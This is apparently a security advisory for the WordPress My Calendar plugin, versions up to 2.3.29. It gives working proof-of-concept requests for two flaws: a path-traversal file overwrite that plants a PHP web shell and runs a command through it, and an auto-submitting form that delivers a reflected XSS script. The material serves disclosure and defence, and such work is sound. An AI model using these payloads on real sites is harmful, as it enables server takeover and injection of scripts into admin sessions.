My Calendar <= 2.3.29 – Arbitrary File Override & Reflected XSS

Description

The file override vulnerability allows an admin to override any file on the web server, ignoring settings such as DISALLOW_FILE_EDIT.

Proof of Concept

Arbitrary File Override
-----------------------

POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles
   Post Data:
      _wpnonce[a_valid_nonce]
      mc_edit_style[true]

mc_css_file[../../../../../../../var/www/wordpress/wp-content/plugins/some-plugin/some-writable-file.php]
      mc_show_css[]
      style[<?php passthru($_GET['exec']) ?>]
      save[Save+Changes]

GET
http://localhost/wordpress/wp-content/plugins/some-plugin/some-writable-file.php?exec=id

Reflected XSS
-------------

<form name="myform"
action="http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-help"
method="POST">
<input name="generator" id="generator" value="1">
<input name="foo" id="foo" value="</textarea><script>alert(1)</script>">
<input type="submit" value="Submit">
</form>
<script>document.myform.submit();</script>